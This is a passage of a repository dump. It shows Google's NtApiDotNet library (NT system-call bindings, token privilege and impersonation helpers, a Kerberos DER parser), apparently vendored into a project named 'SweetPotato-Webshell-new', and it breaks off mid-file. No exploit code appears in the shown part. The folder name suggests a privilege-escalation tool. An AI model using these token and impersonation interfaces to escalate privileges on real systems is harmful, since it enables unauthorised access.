10 | https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools
11 | false
12 | A .NET class library to access native NT API system calls
13 |
14 | 1.1.27
15 | --------
16 | * Added support for directory change notifications.
17 | * Added New-NtDesktop, Get-NtDesktop and Get-NtDesktopName.
18 | * Added New-NtWindowStation, Get-NtWindowStation and Get-NtWindowStationName.
19 | * Changed Win32 error codes to an enumeration.
20 | * Added Load/Unload driver.
21 | * Added properties to NtType to show access masks.
22 | * Added basic SendInput method.
23 | * Added token source tab to Token Viewer.
24 | * Updated for the Job object and New-NtJob.
25 | * Added NtWindow class a HWND enumeration.
26 | * Added Get-AccessibleWindowStation command.
27 | * Added some well known WNF names.
28 | * Added option to Get-AccessibleService to check file permissions.
29 | * Added Set-NtProcessJob command.
30 | * Added Get-AccessibleToken command.
31 | * Added support for compound ACEs.
32 | * Added Get/Sid-NtTokenSid and Get/Set-NtTokenGroup.
33 | * Added Get-AccessibleEventTrace command.
34 | * Added Get-AccessibleWnf command.
35 |
36 | Copyright Google Inc. 2016-2020
37 | syscalls
38 |
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtEtwRegistration.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet
16 | {
17 | ///
18 | /// Class to represent an NT trace GUID.
19 | ///
20 | [NtType("EtwRegistration")]
21 | public class NtEtwRegistration : NtObjectWithDuplicate
22 | {
23 | #region Constructors
24 | internal sealed class NtTypeFactoryImpl : NtTypeFactoryImplBase
25 | {
26 | public NtTypeFactoryImpl() : base(false)
27 | {
28 | }
29 | }
30 |
31 | internal NtEtwRegistration(SafeKernelObjectHandle handle) : base(handle)
32 | {
33 | }
34 | #endregion
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtRtl.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet
18 | {
19 | #pragma warning disable 1591
20 | public static partial class NtRtl
21 | {
22 | [DllImport("ntdll.dll")]
23 | public static extern int RtlNtStatusToDosError(NtStatus status);
24 |
25 | [DllImport("ntdll.dll")]
26 | public static extern int RtlNtStatusToDosErrorNoTeb(NtStatus status);
27 | }
28 | #pragma warning restore 1591
29 | }
30 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtStructures.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet
19 | {
20 | #pragma warning disable 1591
21 | [StructLayout(LayoutKind.Explicit)]
22 | public class LargeInteger
23 | {
24 | [FieldOffset(0)]
25 | public uint LowPart;
26 | [FieldOffset(4)]
27 | public int HighPart;
28 | [FieldOffset(0)]
29 | public long QuadPart;
30 |
31 | public LargeInteger()
32 | {
33 | }
34 |
35 | public LargeInteger(long value)
36 | {
37 | QuadPart = value;
38 | }
39 |
40 | internal DateTime ToDateTime()
41 | {
42 | return DateTime.FromFileTime(QuadPart);
43 | }
44 | }
45 |
46 | [StructLayout(LayoutKind.Explicit)]
47 | public struct LargeIntegerStruct
48 | {
49 | [FieldOffset(0)]
50 | public uint LowPart;
51 | [FieldOffset(4)]
52 | public int HighPart;
53 | [FieldOffset(0)]
54 | public long QuadPart;
55 |
56 | internal DateTime ToDateTime()
57 | {
58 | try
59 | {
60 | return DateTime.FromFileTime(QuadPart);
61 | }
62 | catch (ArgumentException)
63 | {
64 | return DateTime.MinValue;
65 | }
66 | }
67 | }
68 | #pragma warning restore 1591
69 | }
70 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtWaitNative.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet
19 | {
20 | #pragma warning disable 1591
21 | public enum WaitType
22 | {
23 | WaitAll,
24 | WaitAny
25 | }
26 |
27 | public static partial class NtSystemCalls
28 | {
29 | [DllImport("ntdll.dll")]
30 | public static extern NtStatus NtWaitForSingleObject(
31 | SafeKernelObjectHandle Handle,
32 | bool Alertable,
33 | LargeInteger Timeout
34 | );
35 |
36 | [DllImport("ntdll.dll")]
37 | public static extern NtStatus NtWaitForMultipleObjects(int HandleCount,
38 | IntPtr[] Handles, WaitType WaitType, bool Alertable, LargeInteger Timeout);
39 |
40 | [DllImport("ntdll.dll")]
41 | public static extern NtStatus NtSignalAndWaitForSingleObject(
42 | SafeKernelObjectHandle ObjectToSignal,
43 | SafeKernelObjectHandle WaitableObject,
44 | bool Alertable,
45 | LargeInteger Timeout);
46 | }
47 | #pragma warning disable 1591
48 | }
49 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtWindowNative.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet
19 | {
20 | #pragma warning disable 1591
21 |
22 | public enum QueryWindowType
23 | {
24 | ProcessId = 0,
25 | Owner = 1,
26 | ThreadId = 2,
27 | Hung = 5,
28 | }
29 |
30 | public static partial class NtSystemCalls
31 | {
32 | [DllImport("win32u.dll")]
33 | public static extern NtStatus NtUserBuildHwndList(SafeKernelObjectHandle Desktop, IntPtr ParentWindow,
34 | [MarshalAs(UnmanagedType.Bool)] bool EnumerateChildren, bool HideImmersiveWindows, int ThreadId, int BufferCount,
35 | [Out, MarshalAs(UnmanagedType.LPArray)] IntPtr[] Buffer, out int RequiredCount);
36 |
37 | [DllImport("win32u.dll", SetLastError = true)]
38 | public static extern int NtUserQueryWindow(IntPtr Window, QueryWindowType query);
39 |
40 | [DllImport("win32u.dll", SetLastError = true)]
41 | public static extern int NtUserGetClassName(IntPtr Window, [MarshalAs(UnmanagedType.Bool)] bool RealName, UnicodeStringAllocated Name);
42 | }
43 |
44 | #pragma warning restore
45 | }
46 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.InteropServices;
3 |
4 | // General Information about an assembly is controlled through the following
5 | // set of attributes. Change these attribute values to modify the information
6 | // associated with an assembly.
7 | [assembly: AssemblyTitle("NtApiDotNet")]
8 | [assembly: AssemblyDescription("")]
9 | [assembly: AssemblyConfiguration("")]
10 | [assembly: AssemblyCompany("Google Inc.")]
11 | [assembly: AssemblyProduct("NtApiDotNet")]
12 | [assembly: AssemblyCopyright("Copyright © Google Inc. 2016-2020")]
13 | [assembly: AssemblyTrademark("")]
14 | [assembly: AssemblyCulture("")]
15 |
16 | // Setting ComVisible to false makes the types in this assembly not visible
17 | // to COM components. If you need to access a type in this assembly from
18 | // COM, set the ComVisible attribute to true on that type.
19 | [assembly: ComVisible(false)]
20 |
21 | // The following GUID is for the ID of the typelib if this project is exposed to COM
22 | [assembly: Guid("6aeb5004-6093-4c23-aeae-911d64cacc58")]
23 |
24 | // Version information for an assembly consists of the following four values:
25 | //
26 | // Major Version
27 | // Minor Version
28 | // Build Number
29 | // Revision
30 | //
31 | // You can specify all the values or you can default the Build and Revision Numbers
32 | // by using the '*' as shown below:
33 | // [assembly: AssemblyVersion("1.0.*")]
34 | [assembly: AssemblyVersion("1.0.0.0")]
35 | [assembly: AssemblyFileVersion("1.1.27.0")]
36 | [assembly: AssemblyInformationalVersion("1.1.27")]
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Readme.txt:
--------------------------------------------------------------------------------
1 | NtApiDotNet - Managed .NET library for accessing NT API
2 |
3 | (c) Google Inc. 2015, 2016, 2017, 2018, 2019
4 | Developed by James Forshaw
5 |
6 | This library is written entirely in C# to allow managed applications easy access to
7 | various native NT API routines. It's used as the core of the sandbox analysis tools
8 | as well as a Powershell Module. The purpose of this library is to make it easier to
9 | call into the NT API, handling things like variable length structures and lifetime
10 | management.
11 |
12 | The majority of the exposed classes and methods have XML documentation, which can
13 | be used for intellisense or converted into real documentation. Most of the low-level
14 | APIs are not documented however, see the code for usage examples.
15 |
16 | In addition to my own reverse engineering efforts and MSDN documentation the following
17 | people or resources have proven invaluable in determing API functionality.
18 |
19 | Process Hacker Sources: http://processhacker.sourceforge.net/
20 | Windows NT/2000 Native API Reference: Gary Nebbett (ISBN 9781578701995)
21 | Alex Ionescu
22 | ALPC RPC client code inspired by work by Clement Rouault (@hakril) and Thomas Imbert
23 | (@masthoon) at PacSec (https://pacsec.jp/psj17/PSJ2017_Rouault_Imbert_alpc_rpc_pacsec.pdf)
24 | And others I've no doubt forgotten.
25 |
26 | NOTE: It's still a work in progress and it's not designed to act as a documentation
27 | source for the entire NT API. There will be bits missing. Patches are welcome to
28 | add missing functions or fix bugs, see the CONTRIBUTING file in the root of the solution.
29 |
30 | Building for PowerShell Core 6.0/.NET Core 2.0
31 | -----------------------------------------
32 |
33 | In order to build for PowerShell Core 6.0 use the command line:
34 |
35 | dotnet build NtApiDotNet\NtApiDotNet.Core.csproj -c Release
36 |
37 | Building for .NET Core does not currently work in Visual Studio 2017.
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeAlpcPortSectionHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using Microsoft.Win32.SafeHandles;
16 | using System;
17 |
18 | namespace NtApiDotNet
19 | {
20 | ///
21 | /// Safe handle for a port section.
22 | ///
23 | public class SafeAlpcPortSectionHandle : SafeHandleZeroOrMinusOneIsInvalid
24 | {
25 | internal SafeAlpcPortSectionHandle(AlpcHandle handle, bool owns_handle, NtAlpc port) : base(owns_handle)
26 | {
27 | SetHandle(new IntPtr(handle.Value));
28 | Port = port;
29 | }
30 |
31 | internal NtAlpc Port { get; }
32 |
33 | ///
34 | /// Release handle.
35 | ///
36 | /// True if handle released successfully.
37 | protected override bool ReleaseHandle()
38 | {
39 | if (Port == null || Port.Handle.IsClosed)
40 | {
41 | return false;
42 | }
43 | return NtSystemCalls.NtAlpcDeletePortSection(Port.Handle,
44 | AlpcDeletePortSectionFlags.None, handle.ToInt64()).IsSuccess();
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeHandleListHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Collections.Generic;
17 | using System.Linq;
18 | using System.Runtime.InteropServices;
19 |
20 | namespace NtApiDotNet
21 | {
22 | internal sealed class SafeHandleListHandle : SafeHGlobalBuffer
23 | {
24 | private DisposableList _handles;
25 | public SafeHandleListHandle(IEnumerable handles)
26 | : base(IntPtr.Size * handles.Count())
27 | {
28 | _handles = handles.ToDisposableList();
29 | IntPtr buffer = handle;
30 | for (int i = 0; i < _handles.Count; ++i)
31 | {
32 | Marshal.WriteIntPtr(buffer, _handles[i].DangerousGetHandle());
33 | buffer += IntPtr.Size;
34 | }
35 | }
36 |
37 | public static SafeHandleListHandle CreateAndDuplicate(IEnumerable handles)
38 | {
39 | return new SafeHandleListHandle(handles.Select(h => NtObject.DuplicateHandle(h)));
40 | }
41 |
42 | public static SafeHandleListHandle CreateAndDuplicate(IEnumerable handles)
43 | {
44 | return CreateAndDuplicate(handles.Select(h => h.Handle));
45 | }
46 |
47 | protected override bool ReleaseHandle()
48 | {
49 | _handles.Dispose();
50 | return base.ReleaseHandle();
51 | }
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeIoStatusBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet
18 | {
19 | ///
20 | /// Non-generic buffer to hold an IO_STATUS_BLOCK.
21 | ///
22 | public sealed class SafeIoStatusBuffer : SafeStructureInOutBuffer
23 | {
24 | private SafeIoStatusBuffer(int dummy_length) : base(IntPtr.Zero, dummy_length, false)
25 | {
26 | }
27 |
28 | ///
29 | /// Constructor.
30 | ///
31 | public SafeIoStatusBuffer()
32 | {
33 | }
34 |
35 | ///
36 | /// Get a buffer which represents NULL.
37 | ///
38 | new public static SafeIoStatusBuffer Null { get { return new SafeIoStatusBuffer(0); } }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeSidBufferHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using Microsoft.Win32.SafeHandles;
16 | using System;
17 |
18 | namespace NtApiDotNet
19 | {
20 | #pragma warning disable 1591
21 | ///
22 | /// Safe SID buffer.
23 | ///
24 | /// This is used to return values from the RTL apis which need to be freed using RtlFreeSid
25 | public sealed class SafeSidBufferHandle : SafeHandleZeroOrMinusOneIsInvalid
26 | {
27 | public SafeSidBufferHandle(IntPtr sid, bool owns_handle) : base(owns_handle)
28 | {
29 | SetHandle(sid);
30 | }
31 |
32 | public SafeSidBufferHandle() : base(true)
33 | {
34 | }
35 |
36 | public static SafeSidBufferHandle Null { get
37 | { return new SafeSidBufferHandle(IntPtr.Zero, false); }
38 | }
39 |
40 | public int Length
41 | {
42 | get { return NtRtl.RtlLengthSid(handle); }
43 | }
44 |
45 | public Sid ToSid()
46 | {
47 | return new Sid(DangerousGetHandle());
48 | }
49 |
50 | protected override bool ReleaseHandle()
51 | {
52 | if (!IsInvalid)
53 | {
54 | NtRtl.RtlFreeSid(handle);
55 | handle = IntPtr.Zero;
56 | }
57 | return true;
58 | }
59 | }
60 |
61 | #pragma warning restore 1591
62 | }
63 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeStringBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Text;
16 |
17 | namespace NtApiDotNet
18 | {
19 | internal sealed class SafeStringBuffer : SafeHGlobalBuffer
20 | {
21 | public SafeStringBuffer(string str) : base(Encoding.Unicode.GetBytes(str + "\0"))
22 | {
23 | }
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeTokenPrivilegesBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet
19 | {
20 | ///
21 | /// Safe buffer for token privileges.
22 | ///
23 | public class SafeTokenPrivilegesBuffer : SafeStructureInOutBuffer
24 | {
25 | ///
26 | /// Constructor.
27 | ///
28 | /// List of privileges.
29 | public SafeTokenPrivilegesBuffer(LuidAndAttributes[] privs)
30 | : base(new TokenPrivileges() { PrivilegeCount = privs.Length },
31 | Marshal.SizeOf(typeof(LuidAndAttributes)) * privs.Length, true)
32 | {
33 | Data.WriteArray(0, privs, 0, privs.Length);
34 | }
35 |
36 | private SafeTokenPrivilegesBuffer()
37 | : base(IntPtr.Zero, 0, false)
38 | {
39 | }
40 |
41 | ///
42 | /// NULL safe buffer.
43 | ///
44 | new public static SafeTokenPrivilegesBuffer Null { get { return new SafeTokenPrivilegesBuffer(); } }
45 | }
46 | #pragma warning restore 1591
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/ThreadImpersonationContext.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet
18 | {
19 | ///
20 | /// Disposable class to scope an impersonation context.
21 | ///
22 | public sealed class ThreadImpersonationContext : IDisposable
23 | {
24 | private NtThread _thread;
25 |
26 | internal ThreadImpersonationContext(NtThread thread)
27 | {
28 | _thread = thread;
29 | }
30 |
31 | ///
32 | /// Revert impersonation back to the current user.
33 | ///
34 | public void Revert()
35 | {
36 | if (_thread != null)
37 | {
38 | using (_thread)
39 | {
40 | _thread.SetImpersonationToken(null, false);
41 | }
42 | _thread = null;
43 | }
44 | }
45 |
46 | void IDisposable.Dispose()
47 | {
48 | Revert();
49 | }
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/UnicodeStringBytesSafeBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet
16 | {
17 | ///
18 | /// Implements a UnicodeString which contains raw bytes.
19 | ///
20 | public class UnicodeStringBytesSafeBuffer : SafeStructureInOutBuffer
21 | {
22 | ///
23 | /// Constructor.
24 | ///
25 | /// The bytes for the name.
26 | public UnicodeStringBytesSafeBuffer(byte[] ba)
27 | : base(ba.Length, true)
28 | {
29 | Data.WriteBytes(ba);
30 | Result = new UnicodeStringOut
31 | {
32 | Length = (ushort)ba.Length,
33 | MaximumLength = (ushort)ba.Length,
34 | Buffer = Data.DangerousGetHandle()
35 | };
36 | }
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/ASN1/DERParser.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Collections.Generic;
16 | using System.IO;
17 |
18 | namespace NtApiDotNet.Utilities.ASN1
19 | {
20 | ///
21 | /// A basic ASN.1 DER parser to process Kerberos and SPNEGO Tokens.
22 | ///
23 | internal class DERParser
24 | {
25 | private static DERValue[] ParseData(long offset, byte[] data, int index)
26 | {
27 | MemoryStream stm = new MemoryStream();
28 | stm.Write(data, index, data.Length - index);
29 | stm.Position = 0;
30 | BinaryReader reader = new BinaryReader(stm);
31 | List values = new List();
32 | while (reader.RemainingLength() > 0)
33 | {
34 | DERValue v = reader.ReadValue(offset);
35 | if (v.Constructed)
36 | {
37 | v.Children = ParseData(v.DataOffset, v.Data, 0);
38 | }
39 | values.Add(v);
40 | }
41 | return values.ToArray();
42 | }
43 |
44 | public static DERValue[] ParseData(byte[] data, int index)
45 | {
46 | return ParseData(0, data, index);
47 | }
48 |
49 | public static DERValue[] ParseFile(string path)
50 | {
51 | return ParseData(File.ReadAllBytes(path), 0);
52 | }
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/ASN1/DERTagType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Utilities.ASN1
16 | {
17 | internal enum DERTagType
18 | {
19 | Universal = 0,
20 | Application = 1,
21 | ContextSpecific = 2,
22 | Private = 3,
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/ASN1/OIDValues.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Utilities.ASN1
16 | {
17 | ///
18 | /// Class containing known OID values.
19 | ///
20 | internal static class OIDValues
21 | {
22 | internal const string KERBEROS_NAME = "1.2.840.113554.1.2.2.1";
23 | internal const string KERBEROS_PRINCIPAL = "1.2.840.113554.1.2.2.2";
24 | internal const string KERBEROS_USER_TO_USER_OID = "1.2.840.113554.1.2.2.3";
25 | internal const string KERBEROS_OID = "1.2.840.113554.1.2.2";
26 | internal const string MS_KERBEROS = "1.2.840.48018.1.2.2";
27 | internal const string NTLM_SSP = "1.3.6.1.4.1.311.2.2.10";
28 | internal const string MS_NEGOX = "1.3.6.1.4.1.311.2.2.30";
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/ASN1/UniversalTag.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Utilities.ASN1
16 | {
17 | internal enum UniversalTag
18 | {
19 | EOC = 0,
20 | BOOLEAN = 1,
21 | INTEGER = 2,
22 | BIT_STRING = 3,
23 | OCTET_STRING = 4,
24 | NULL = 5,
25 | OBJECT_IDENTIFIER = 6,
26 | ENUMERATED = 10,
27 | UTF8String = 12,
28 | RELATIVE_OBJECT_IDENTIFIER = 13,
29 | SEQUENCE = 16,
30 | SET = 17,
31 | PrintableString = 19,
32 | T16String = 20,
33 | IA5String = 22,
34 | UTCTime = 23,
35 | GeneralizedTime = 24,
36 | GeneralString = 27,
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/Memory/CrossBitnessTypeAttribute.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Reflection;
17 |
18 | namespace NtApiDotNet.Utilities.Memory
19 | {
20 | internal class CrossBitnessTypeAttribute : Attribute
21 | {
22 | private Lazy _base_method;
23 | public Type CrossBitnessType { get; }
24 |
25 | private static MethodInfo GetMethodInfo(Type cross_bitness_type)
26 | {
27 | Func read_memory = NtProcess.Current.ReadMemory;
28 | return read_memory.Method.GetGenericMethodDefinition().MakeGenericMethod(cross_bitness_type);
29 | }
30 |
31 | public CrossBitnessTypeAttribute(Type cross_bitness_type)
32 | {
